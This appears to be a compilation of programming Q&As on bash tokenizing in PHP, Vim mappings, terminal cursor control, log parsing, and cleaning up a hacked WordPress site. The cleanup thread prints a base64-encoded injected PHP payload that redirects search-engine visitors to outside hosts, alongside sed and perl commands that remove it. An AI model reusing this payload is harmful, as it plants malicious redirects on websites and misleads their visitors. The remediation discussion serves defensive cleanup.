What is the best way to tokenize a bash shell command in PHP?

I am in a situation where I need to take a (potentially) multi-line bash command and squash it into one string that contains no newline or carriage return characters yet produces the same result (i.e. command semantics must not be affected).
Below are a few examples of inputs and corresponding expected outputs.
INPUT:
echo A
echo B
EXPECTED OUTPUT:
echo A;echo B
INPUT:
echo "continued
string"
echo "other"
EXPECTED OUTPUT:
echo "continued"$'\n'"string";echo "other"
INPUT:
cat file1 \
file2 \
file3
EXPECTED OUTPUT:
cat file1 file2 file3
INPUT:
for f in `pwd`/*
do
{ echo A; echo B
echo C; echo D; }
done
EXPECTED OUTPUT:
for f in `pwd`/*; do { echo A; echo B; echo C; echo D; }; done
And so on. Obviously I cannot just
preg_replace('/[\r\n]+/', ';', $input);
because the shell supports compound commands and command lists, multiline strings, the line continuation operator ('\') and much more. It seems I have no other way but to tokenize the input command and go from there. My bash knowledge is mediocre, so there may be cases that I missed, and the solution needs to handle those as well.
Is there an existing PHP library or package (I have searched packagist to no avail) that would help me get closer to my goal? If not, how would you approach this challenge (no need to write code, just point me in the right direction)?
As a desperate fallback I'll have to resort to porting the bash source code itself, but I really hope that someone will suggest a shortcut.

Trying to create a parser for bash is a very ambitious (and ambiguous) project. Bash is constantly evolving and, in certain areas, pushes the boundary beyond the POSIX standard. Consider scaling down the project: maybe target the POSIX shell (which will cover many shell variants: dash, ash, ...).
Consider starting with https://pubs.opengroup.org/onlinepubs/9699919799/ which identifies a few quoting options. If you implement those carefully, your approach (replacing end-of-lines with ';') may work.
Another alternative would be to start with a bash syntax highlighter, for example the vim highlighter (/usr/share/vim/vimNN/syntax/sh.vim, where NN is the vim version).
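To make the "implement the quoting rules carefully" idea concrete, here is a minimal sketch in Python (not PHP, and not a full parser). The function name squash is hypothetical. It tracks only single quotes, double quotes and backslash escapes, drops backslash-newline continuations, and rewrites a newline inside a quoted string using the $'\n' form from the question's expected output, which is a bash feature rather than POSIX. It deliberately ignores reserved words (do, then, {), here-documents, comments and command substitution, so a newline after "do" would still get a wrong ';'.

```python
def squash(cmd: str) -> str:
    """Join a multi-line shell command into one line (partial sketch)."""
    # Assumption: line endings are normalised and outer blank lines dropped.
    cmd = cmd.replace("\r\n", "\n").strip("\n")
    out = []          # emitted fragments
    quote = None      # None, "'" or '"': the quote we are currently inside
    pending = False   # True if a command has started since the last separator
    i, n = 0, len(cmd)
    while i < n:
        c = cmd[i]
        nxt = cmd[i + 1] if i + 1 < n else ""
        # Backslash is special everywhere except inside single quotes.
        if c == "\\" and quote != "'" and nxt:
            if nxt != "\n":          # escaped character: keep the pair verbatim
                out.append(c + nxt)
                pending = True
            i += 2                   # backslash-newline is dropped entirely
            continue
        if quote is None:
            if c == "\n":
                if pending:          # skip blank lines and lines ending in ; & |
                    out.append(";")
                    pending = False
            else:
                if c in "'\"":
                    quote = c
                if c in ";&|":
                    pending = False
                elif not c.isspace():
                    pending = True
                out.append(c)
        elif c == quote:             # closing quote
            quote = None
            out.append(c)
        elif c == "\n":              # newline inside quotes: close, $'\n', reopen
            out.append(quote + "$'\\n'" + quote)
        else:
            out.append(c)
        i += 1
    return "".join(out)


print(squash("echo A\necho B"))                 # echo A;echo B
print(squash("cat file1 \\\nfile2 \\\nfile3"))  # cat file1 file2 file3
```

Handling the compound-command example from the question would additionally require recognising reserved words as separate tokens, which is where a real tokenizer becomes necessary.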

Related

Vim replace text on the fly ( "." => "->")

I have this project in PHP I am working on and I find it very annoying to type -> to call methods. I want to make vim do the job for me. I want it to replace [^\s]. (non space + dot) with ->.
Also, the dollar variable prefix annoys me, and I wish I could replace \s[a-z_] (whitespace followed by a lowercase letter a to z or an underscore) with $ + the next letter I typed.
I.E.
a #=> $a
foo + bar # => $foo + $bar
this #=> $this
this.myMethod() #=> $this->myMethod()
That should happen only in php files, of course.
Is there a way to accomplish that? Something a little fancier than abbreviations maybe.

For the first problem:
inoremap . ->
in your .vimrc would suffice. If you want it specific to php files:
filetype on
autocmd FileType php inoremap . ->
As for the second, I don't really see a way this can be written to work automatically.

I am not sure it is a good idea to handle your source code this way, since it could destroy your code. However, for your requirement, this line does the two substitutions you wanted:
%s/\v(\s|^)\ze[a-z_]/&$/g|%s/\./->/g
at least it works for the example you gave.
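To see what those two substitutions do, and where they over-match, here is a rough Python analogue. It is only an illustration: the function name phpify is hypothetical, and Python's regex dialect differs from Vim's, so treat it as a sketch of the same idea rather than a translation.

```python
import re


def phpify(line: str) -> str:
    """Apply the two substitutions from the :%s command to one line."""
    # Insert "$" before a lowercase letter or underscore that starts the
    # line or follows whitespace (the \ze in Vim becomes a lookahead here).
    line = re.sub(r"(\s|^)(?=[a-z_])", r"\1$", line)
    # Replace every literal dot with "->".
    return line.replace(".", "->")


print(phpify("foo + bar"))        # $foo + $bar
print(phpify("this.myMethod()"))  # $this->myMethod()
print(phpify("Just a hack."))     # Just $a $hack->
```

The last call shows the risk: ordinary prose, such as the text of a comment, is rewritten just like code.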

Though you can build such "conditional remappings" with :imap <expr>, I highly recommend against doing that.
Your stated rules are still way too simplistic; the first one wouldn't allow you to enter any comments like Just a hack. (it would turn into Just a hack->). You'll spend more time (laboriously) tweaking your rules, or undoing / suppressing the automatic conversion, than you save by skipping a single keystroke here and there.
Imagine yourself in another editor, in a debugger, or on a colleague's laptop. By then you're dependent on your auto-conversion scheme, and you'll look like a fool!
To me, it looks like you're coming from a different background and still feel the beginner's pain of walking in unknown terrain. Persevere; you'll get over that soon!

Deleting base64 Eval Junk with (osx) terminal

Trying to clean up after a slew of php injections -- every php function in about six sites worth of WordPress templates is full of junk.
I've got everything off the server, onto a local machine, and I'm hoping there should be a good way to delete all of the enormous code strings with terminal.
Of which I know approximately nothing.
http://devilsworkshop.org/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/ had good instructions for doing a clear on the server, but substituting my path/to/folder doesn't seem to be working in terminal.
Feeling I'm close, but, blind as I am to the ways of the terminal, that doesn't seem that comforting.
Based on the above, here's what I've got -- any help would be so amazingly appreciated.
grep -lr --include=*.php "eval(base64_decode" "/Users/Moxie/Desktop/portfolio-content" | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
UPDATED
derobert -- thanks a million for helping with this --
basically, the space after every <?php before the actual function had this inserted into it:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
The characters change with each one, so a simple find and replace won't work (which was, I'm pretty sure, the point).

Here is the code that proved to be a valid solution for me.
I downloaded all the files to my local machine and started working on a solution. Here it is (combined with what I found by googling):
#!/bin/bash
FILES=$(find ./ -name "*.php" -type f)
for f in $FILES
do
echo "Processing $f file LONG STRING"
sed -i 's#eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));##g' $f
echo "Processing $f file SMALL STRING"
sed -i 's#eval(base64_decode.*));##g' $f
done
Save it somewhere as mybash.sh (from your favourite text editor), then make it executable and run it:
$ sudo chmod +x mybash.sh # execute permission for the script
$ ./mybash.sh
I used the first one (LONG STRING) because the pattern is always the same. Here is the explanation of the second, shorter command:
s# - the substitute command with # as the delimiter {# plays the same role as the usual / in sed}
eval(base64_decode.*)); - the pattern to match {in the regular expression, . matches any single character and * matches the preceding element zero or more times}
# - second appearance of the delimiter; nothing follows it, which means the matched string {eval(base64_decode.*));} is replaced WITH {''}
#g - closing delimiter plus the g flag, which replaces every match on the line

So, someone got access to write to arbitrary files on your server. I assume you've cleaned up the exploit that let them in already.
The problem is, while the eval(base64_decode stuff is obvious, and has to go, the intruder could have put other stuff in there. Who knows, maybe he deleted a mysql_real_escape_string somewhere, to leave you vulnerable to future SQL injection? Or a htmlspecialchars, leaving you vulnerable to JavaScript injection? Could have done anything. Might not even be PHP; you sure no JavaScript was added? Or embeds?
The best way to be sure is to compare to a known-good copy. You do have version control and backups, right?
Otherwise, you can indeed use perl -pi -e to do a substitute on that PHP code, though matching it might be difficult, depending. This might work (work on a copy!), and adjust spacing in the regexp as needed:
perl -pi -e 's!<\?php eval\(base64_decode\(.*?\)\) \?>!!g' *.php
but really, you should review each file by hand, to confirm there are no other exploits present. Even if your last known-good copies are somewhat old, you can review the diffs.
edit:
Ok, so it sounds like you don't want to nuke the whole PHP block, just the eval line:
perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' *.php
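You may want to add a \n before the first ! if there is additionally a newline to kill, etc. If the base64 actually has newlines in it, then you will need to add s after the g, and also run perl with -0777 so that each file is read as a whole rather than line by line (otherwise the pattern never sees more than one line at a time).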
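One caveat about pattern choice: the greedy .* in the sed command from the other answer runs to the last )); on the line, so it can delete legitimate code that follows the injection. The non-greedy .*? used above avoids that. A stricter alternative is to allow only base64 characters between the quotes. The sketch below shows that idea in Python; the name strip_injection is hypothetical, and it assumes the payload is always a double-quoted base64 literal, as in the sample shown in the question.

```python
import re

# Only base64 alphabet characters (plus whitespace, in case the payload
# is wrapped across lines) may appear between the quotes.
INJECTED = re.compile(r'eval\(base64_decode\("[A-Za-z0-9+/=\s]*"\)\);')


def strip_injection(source: str) -> str:
    """Remove every injected eval(base64_decode("...")); call from source."""
    return INJECTED.sub("", source)


sample = 'a(); eval(base64_decode("QUJD")); b(); foo(bar("x"));'
print(strip_injection(sample))  # a();  b(); foo(bar("x"));
```

As with the perl one-liners, run anything like this on a copy and still review the files by hand afterwards.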

Shell script to recursively rename filenames with special characters escaped?

PHP has a function escapeshellcmd() that escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands.
<?php
exec("find /music -type f -iname '*mp3'", $arrSongPaths);
echo $arrSongPaths[0]; // prints It Won´t Be Long.mp3
echo escapeshellcmd($arrSongPaths[0]); // prints It Wont Be Long.mp3
?>
Is there a way to write a shell script that will recursively rename filenames (in particular *mp3) with special characters escaped?
I tried to do this in php
$escapedSongPath = escapeshellarg($arrSongPaths[0]);
exec("mv $arrSongPaths[0] $escapedSongPath");
but that didn't work. Anyways the last line of code is unsafe since you're executing a command with a potentially dangerous filename $arrSongPaths[0].

For the love of all things security related, why aren't you using PHP's rename() function? It doesn't suffer from any shell escape issues. Replace the exec("mv ...") with:
rename($arrSongPaths[0], $escapedSongPath)
... and check for errors.
And instead of using exec("find ...") use the recursive_glob tip from the PHP glob manual page.
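The same "no shell involved" approach can be sketched in Python for comparison: walk the tree with the standard library and rename through the filesystem API, so no filename is ever interpreted by a shell. The names safe_name and rename_tree and the character whitelist are assumptions made for illustration; choose whatever naming policy you actually need.

```python
import os
import re


def safe_name(name: str) -> str:
    """Hypothetical policy: keep letters, digits, space, dot, dash, underscore."""
    return re.sub(r"[^A-Za-z0-9 ._-]", "", name)


def rename_tree(root: str, suffix: str = ".mp3") -> list:
    """Rename matching files under root; return (old, new) path pairs."""
    renamed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            new = safe_name(name)
            if not name.lower().endswith(suffix) or new == name:
                continue
            src = os.path.join(dirpath, name)
            dst = os.path.join(dirpath, new)
            if os.path.exists(dst):
                continue              # never overwrite an existing file
            os.rename(src, dst)       # plain system call, no shell quoting needed
            renamed.append((src, dst))
    return renamed
```

Calling rename_tree("/music") would process the directory from the question; the returned list makes it easy to log or review what was changed.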

multi-line terminal progress indicator?

In a terminal, if I'm outputting a one-line progress indicator of some sort, in-place, \r would do the trick:
while (1) { echo "progress indication\r"; }
However, I have a progress indicator that really should be multi-line. As \r only returns to the start of the current line, I want something that can move up a couple of lines. Is there a control character/function that allows me to step back lines in the terminal?
Edit: in case I wasn't completely clear, I wish to have something roughly the opposite of \v, the vertical tab, which moves the terminal cursor down a line.

There is no control character to go back onto the previous line, but depending on the TERM= type an ANSI escape might do the trick.
echo -e "\033[2A"
Here's a list that might be more helpful: http://en.wikipedia.org/wiki/ANSI_escape_code and for usage in the shell http://www.linuxselfhelp.com/howtos/Bash-Prompt/Bash-Prompt-HOWTO-6.html
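As a minimal sketch of how that escape can drive a multi-line indicator (in Python rather than PHP, and assuming a terminal that honours ANSI sequences): print the block once, then before each redraw move the cursor up by the number of lines and overwrite them. The function name render is hypothetical; \033[NA (cursor up N lines) and \033[2K (erase the current line) are standard ANSI sequences.

```python
import sys
import time


def render(lines, first, out=sys.stdout):
    """Draw the block of lines; on redraws, move back up over the old block."""
    if not first:
        out.write(f"\033[{len(lines)}A")     # cursor up len(lines) lines
    for line in lines:
        out.write("\033[2K" + line + "\n")   # erase the old line, write the new one
    out.flush()


if __name__ == "__main__":
    for step in range(6):
        render([f"download: {step * 20}%", f"unpack:   {step * 10}%"],
               first=(step == 0))
        time.sleep(0.2)
```

Erasing each line before rewriting it matters when a new line is shorter than the one it replaces.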

How to extract block of XML from a log file on Linux

I have a log file that looks like the following:
2010-05-12 12:23:45 Some sort of log entry
2010-05-12 01:45:12 Request XML: <RootTag>
<Element>Value</Element>
<Element>Another Value</Element>
</RootTag>
2010-05-12 01:45:32 Response XML: <ResponseRoot>
<Element>Value</Element>
</ResponseRoot>
2010-05-12 01:45:49 Another log entry
What I want to do is extract the Request and Response XML (and ultimately dump them into their own single files). I had a similar parser that used egrep but the XML was all on one line, not multiple ones like above.
The log files are also somewhat large, hitting 500-600 megs a log. Smaller logs I would read in via a PHP script and use regex matching, but the amount of memory required for such a large file would more than likely kill the script.
Is there an easy way using the built-in tools on a Linux box (CentOS in this case) to extract multiple lines or am I going to have to bite the bullet and use Perl or PHP to read in the entire file to extract it?

# Example usage:
# perl script.pl data.xml RootTag > RootTag.xml
use strict;
use warnings;
my $tag = pop;
while (<>){
    if ( s/.*(<$tag>)/$1/ .. s/(<(\/)$tag>).*/$1/ ){
        print;
        last if $2;
    }
}
See the docs for details on the flip-flop operator.

Sounds like a job for sed (I was so tempted to say SuperSed ;-)
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</</;x;p}; ${x;p}' xmllog
where xmllog is your log file's name. You'll get a blank line at the beginning, but that can be filtered out with egrep '.+' or even just tail -n +2.
By way of explanation, sed is a little interpreter for programs that consist of a list of matching conditions and corresponding actions. sed runs through a file line by line (hence the name, "stream editor" -> "sed") and for each line, for each condition in the program that matches the text on the line, it applies the corresponding action. In this case:
/^<.\+>/
is a regular expression condition that matches any line which starts with < followed by any character (.) repeated one or more times (\+) followed by > - basically any line that begins with an XML tag. The associated action is H which appends the line to a "hold buffer". The other condition is
/\(Request\|Response\) XML/
which, of course, is a regexp that matches either Request or Response followed by a space and then XML. The corresponding action is
{s/^.*</</;x;p}
which first does a substitution (s) of the beginning of the line (^) followed by any character (.) repeated any number of times (*) followed by <, with just <. Basically that gets rid of anything before the first XML tag on the line. Then it switches (x) the line just read with the "hold buffer" (which contains the XML of the previous log message) and prints (p) the stuff that was just swapped in from the hold buffer. Finally,
$
matches the last line of the input, and {x;p} again just swaps the contents of the hold buffer into the "print buffer" and then prints it.
You can alter the command to suit your needs, for example if you need something to delimit the different records, this'll put a blank line between them:
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</\n</;x;p}; ${x;p}' xmllog
(in that case, of course, don't use egrep to filter out the blank line at the beginning).

Your question implies you're not thinking right; if there's a way to do what you're asking in one language (there is) ... then you can do it in any language.
There's no reason to read the entire log into memory. You just read it line by line and extract the information you want. You just need to keep a state as to where you are (not in tag, inside RootTag, inside ResponseRoot, etc) and process the data as you wish.
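A minimal sketch of that line-by-line state machine, written in Python for illustration (the same structure carries over to PHP with fgets). The function name extract_xml is hypothetical, and the code assumes the log format shown in the question: a "Request XML:" or "Response XML:" marker followed by the opening tag on the same line, with the matching closing tag appearing later.

```python
import re

# Marker, then the opening tag; group 3 captures the root tag name.
START = re.compile(r"(Request|Response) XML: (<(\w+)>.*)")


def extract_xml(lines):
    """Yield (kind, xml_text) per block while reading one line at a time."""
    kind, closing, buf = None, None, []
    for line in lines:
        line = line.rstrip("\n")
        if kind is None:                  # state: outside any XML block
            m = START.search(line)
            if not m:
                continue
            kind, closing, buf = m.group(1), f"</{m.group(3)}>", [m.group(2)]
        else:                             # state: inside a block
            buf.append(line)
        if closing in line:               # block complete: emit and reset
            yield kind, "\n".join(buf)
            kind, closing, buf = None, None, []
```

Because a file object yields one line at a time, passing open("xmllog") to extract_xml keeps only the current block in memory, regardless of the size of the log.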
